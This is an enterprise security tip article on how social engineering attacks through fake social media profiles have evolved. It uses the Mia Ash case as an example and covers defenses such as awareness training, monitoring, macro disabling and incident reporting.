People will often use the easiest method to achieve their goals, and this especially holds true for attackers.
More often than not, this means that social engineering attacks are used, since technical controls can be more difficult to bypass. As these attacks have evolved, they have also become more difficult to detect and prevent, meaning that social engineering has had to coevolve with them -- from shoulder surfing and pretexting, to using social media as an element of attack.
This tip will explore how social engineering attacks and enterprise defenses for social engineering via social media have both evolved.
How social engineering has evolved
The technical skills for social engineering attacks are different and potentially easier to develop than finding new zero-day attacks or new ways to bypass technical controls. Modern social engineering started out as part of phone phreaking and has always targeted people with access, whether it was privileged access, such as root or administrator privileges, or access to systems.
Social engineering and its many variants, such as phishing, spear phishing, whaling, smishing and, now, social media, use many of the same basic techniques to get a target to take a requested action. The specific technology or medium used is not as important as the techniques used. Social engineering attacks via social networking use the illusion of trusting someone who seems legitimate because they have a rich social network to back their claims.
SecureWorks published a blog on a social engineering attack they named Mia Ash that used social networking to send the target an attachment, and then got the target to open the attachment, which contained a malicious, macro-laced Microsoft Word document. Once the Word document was opened and the macro executed, a PowerShell command ran to download the PupyRAT malware. This enabled the attacker to take complete control of the system, but required the target user to have administrative access to the system.
The Mia Ash social networking attack used fake Facebook and LinkedIn profiles with legitimate-looking connections and pictures. This attack mirrors a traditional phishing attack that uses legitimate-looking emails with a malicious URL or attachment.
Enterprise defenses for social engineering attacks via social media
Defending against social engineering attacks demands layered protection, including careful monitoring of an enterprise's IT environment. It is not possible to prevent all social engineering attacks, so enterprise security teams should focus on monitoring, response and training.
Frequently, security awareness training has included modules on social engineering and phishing, but there has been debate about the effectiveness of this training. These defenses and having them carefully monitored are necessary, but could also negatively impact privacy for consumers and employees. It may not be possible to stop social engineering without significant privacy impacts, so it's necessary to notify customers and employees that the IT environment is being monitored.
Something else to consider when assessing the risk from social engineering is the potential complexity that might be needed to stop social engineering attacks; that complexity might make systems more brittle and difficult to manage, as well as require additional resources to do the monitoring. Some enterprises may decide to ban the use of social media in the workplace, but that will be about as effective as banning the use of smartphones or any other popular technology.
Since one of the key aspects of the Mia Ash attack was that the attacker wanted the target to open an attachment, it could've been sent via email or posted on a malicious website used in a watering hole attack -- banning social media usage may not have prevented it. It may be more effective to provide some security awareness training around safe social media usage and incident response.
As part of your incident response training, you should make sure people know how to report potential issues and to ask questions about things that seem suspicious, such as someone asking them to open an attachment, provide sensitive information about the organization or visit a suspicious website. Training on social media could include recommendations around only connecting with people you know in real life, have met in person or new connections with whom you share colleagues.
SecureWorks also recommends basic security controls, such as disabling macros in Microsoft Office and using endpoint security tools. These tools could prevent malicious executables from running by using whitelisting or only allowing approved PowerShell commands to execute.
Likewise, having all executables run on a system could enable an enterprise to detect the malicious command or executable. However, this assumes that the endpoint isn't configured with the end user running as an administrator.
It's fun for individuals in security to think they are being attacked by super spies, and it creates great headlines, but sometimes, attacks are simply more mundane social engineering schemes that are very difficult to stop with technical controls. Implementing necessary technical controls is required in many cases, but understanding how they fail and how to monitor failures or suspicious activities is needed to protect your environment.
Ask the expert:
Have a question about enterprise threats? Send it via email today. (All questions are anonymous.)
Learn how to prevent social engineering attacks
Find out why social engineering is a top hacking method
Discover how to apply a hacker mindset to enterprise security